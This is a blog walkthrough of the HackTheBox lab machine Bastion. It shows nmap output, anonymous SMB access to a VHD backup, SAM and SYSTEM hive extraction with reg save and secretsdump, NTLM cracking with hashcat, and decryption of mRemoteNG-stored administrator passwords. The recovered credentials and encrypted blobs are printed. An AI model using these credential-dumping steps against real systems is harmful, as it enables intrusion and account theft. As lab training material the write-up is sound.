HacktheBox — Bastion

sif0
8 min read · Sep 7, 2019

This is a writeup on how I solved Bastion from HacktheBox.

Hack the Box is an online platform where you practice your penetration testing skills.

As I always do, I try to explain how I understood the concepts here from the machine because I want to really understand how things work. So please, if I misunderstood a concept, please let me know. Your corrections are very welcome.

About the box

Bastion is a fairly easy box which teaches basic penetration testing concepts. I enjoyed working on it because it’s a Windows machine, as I find them more amusing than Unix ones.

#TLDR

Initial foothold: A backup share that allows null sessions and contains a VHD
User: Attaching the VHD, then dumping hashes from the SAM database using Impacket’s secretsdump.py
Root: Through enumeration, found the mRemoteNG program and decrypted the Administrator password stored in its confCons.xml

#Initial Foothold

As usual, I run an Nmap scan, saving it to my Nmap directory:

nmap -sV -sC -oA nmap/initial 10.10.10.134

The output is:

PORT    STATE SERVICE      VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -40m01s, deviation: 1h09m14s, median: -3s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-05-02T07:14:20+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-05-02 05:14:21
|_ start_date: 2019-05-02 04:07:48

Open ports are 22, 135, 139 and 445: OpenSSH for Windows, RPC, and SMB. I first check whether I can list shares over a null session using smbclient. A null session is an anonymous SMB session that needs no username or password. The -L flag lists the shares.

smbclient -L 10.10.10.134

When prompted for a password, just press enter.

Seeing the Backups share, I connect to the SMB share using smbclient.

smbclient \\\\10.10.10.134\\Backups

I can see a note.txt, a .tmp file and WindowsImageBackup. The .tmp file is probably a remnant generated when our SMB session connected. The note.txt is a note for sysadmins asking them not to transfer the entire backup locally, since the VPN is too slow. This will make more sense later.

Investigating the files under WindowsImageBackup, I find a .vhd file under L4mpje-PC\Backup 2019-02-22 124351:

The .vhd file is more than 5GB, which is a pain to download locally, especially through a VPN.

Since this is a Windows machine, I decided to attach the .vhd file using a Windows host. I configured OpenVPN on my Windows host and then connected to the VPN.

I then accessed the share using Windows:

You can also type the location of the share into File Explorer, which makes viewing the files much easier.

I can view the files inside the VHD by attaching it. You can read more about it here: https://docs.microsoft.com/en-us/windows-server/storage/disk-management/manage-virtual-hard-disks

For Windows 10, you can right click the Windows logo on the lower left of the Desktop and choose Disk Management then Action → Attach VHD. You will be prompted with a dialog box. Enter the exact path of the .vhd.

\\10.10.10.134\Backups\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

After it loads, you can see a new Disk loaded in the Disk Management.

Note that if you map the share to Z: (net use Z: \\10.10.10.134\Backups) and then specify the location as below, it will not work:

Z:\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

Getting User:

I can now browse the contents of the VHD.

Viewing the Desktop of the User L4mpje, it’s empty.

After checking the directories, I find that C:\Windows\System32\config is accessible. I copy the SAM and SYSTEM hive files, since Windows credentials can be recovered from these two files: SAM holds the hashed passwords and SYSTEM holds the boot key needed to decrypt them. You can learn more about it here:

SAM : https://en.wikipedia.org/wiki/Security_Account_Manager

I copy the files to my Kali machine. Because the VHD is attached, I can simply drag and drop them. If instead I only had command-line access on a Windows host, I could use the commands below to save the hives to a location I can read and write, then transfer them to my machine.

reg save hklm\sam <output location>
reg save hklm\system <output location>

I now use secretsdump.py from Impacket to get the creds. secretsdump can also dump SAM hashes remotely as long as the host is reachable over SMB, but since I have the hives locally, I use the LOCAL option and point it at both files. I invoke:

secretsdump.py -sam SAM -system SYSTEM LOCAL

I get NT hashes for the users Administrator, Guest and L4mpje, and I can crack them using Hashcat. Note that Administrator and Guest have the same NT hash. Learn more about NT hashes by reading through these:

I save the NT hashes in a text file:

From my Windows machine (-m 1000 selects the NTLM hash mode and -a 0 selects a straight wordlist attack, which is what rockyou.txt is for):
hashcat64.exe -a 0 -m 1000 ..\bastion.txt ..\rockyou.txt

I now have valid creds:

L4mpje:bureaulampje

The creds work for SMB, RPC and, most importantly, SSH.

SMB login
RPC login

Logging in to SSH, I can now read user.txt:

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Users\L4mpje
22-02-2019 14:50 <DIR> .
22-02-2019 14:50 <DIR> ..
22-02-2019 16:26 <DIR> Contacts
22-02-2019 16:27 <DIR> Desktop
22-02-2019 16:26 <DIR> Documents
22-02-2019 16:26 <DIR> Downloads
22-02-2019 16:26 <DIR> Favorites
22-02-2019 16:26 <DIR> Links
22-02-2019 16:26 <DIR> Music
22-02-2019 16:26 <DIR> Pictures
22-02-2019 16:26 <DIR> Saved Games
22-02-2019 16:26 <DIR> Searches
22-02-2019 16:26 <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 11.256.795.136 bytes free
l4mpje@BASTION C:\Users\L4mpje>cd Desktop
l4mpje@BASTION C:\Users\L4mpje\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Users\L4mpje\Desktop
22-02-2019 16:27 <DIR> .
22-02-2019 16:27 <DIR> ..
23-02-2019 10:07 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 11.256.795.136 bytes free
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
9bfe57d....

Getting Root:

I first run an enumeration script to find anything useful. I used JAWS from https://github.com/411Hall/JAWS.

To get the script onto the Bastion machine, I host it with python3's http.server module and then start PowerShell on the box:

Then I invoke commands to fetch and execute the file from the http.server. JAWS may take a while to run.

Skimming through the output, the mRemoteNG program stands out.

I check which locations I have Full Control or Modify access to.

I dig more into mRemoteNG by searching for articles about it. You can read more about it here: https://mremoteng.org/

After much reading, I find that it stores saved connection passwords in C:\Users\<username>\AppData\Roaming\mRemoteNG\confCons.xml.

Verifying:

Reading what’s inside, I can see Username and Password fields for Administrator and L4mpje.

Administrator:aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
L4mpje:yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB

I then looked for a way to decrypt the password, and came across this: https://github.com/kmahyyg/mremoteng-decrypt. I decrypt the passwords:

Since I now have credentials for Administrator, I SSH in as that user and can read root.txt:

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>type Desktop/root.txt
The syntax of the command is incorrect.
administrator@BASTION C:\Users\Administrator>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Users\Administrator
25-04-2019 06:08 <DIR> .
25-04-2019 06:08 <DIR> ..
23-02-2019 10:40 <DIR> Contacts
23-02-2019 10:40 <DIR> Desktop
23-02-2019 10:40 <DIR> Documents
23-02-2019 10:40 <DIR> Downloads
23-02-2019 10:40 <DIR> Favorites
23-02-2019 10:40 <DIR> Links
23-02-2019 10:40 <DIR> Music
23-02-2019 10:40 <DIR> Pictures
23-02-2019 10:40 <DIR> Saved Games
23-02-2019 10:40 <DIR> Searches
23-02-2019 10:40 <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 11.255.562.240 bytes free
administrator@BASTION C:\Users\Administrator>cd Desktop
administrator@BASTION C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Users\Administrator\Desktop
23-02-2019 10:40 <DIR> .
23-02-2019 10:40 <DIR> ..
23-02-2019 10:07 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 11.255.562.240 bytes free
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
958850b9181....

So that’s how I solved Bastion from Hack the Box. I hope you learned something from this walkthrough. Thanks for reading my writeup! Cheers! 🍺


sif0

Penetration Tester | Aspiring Red Team Operator 🇵🇭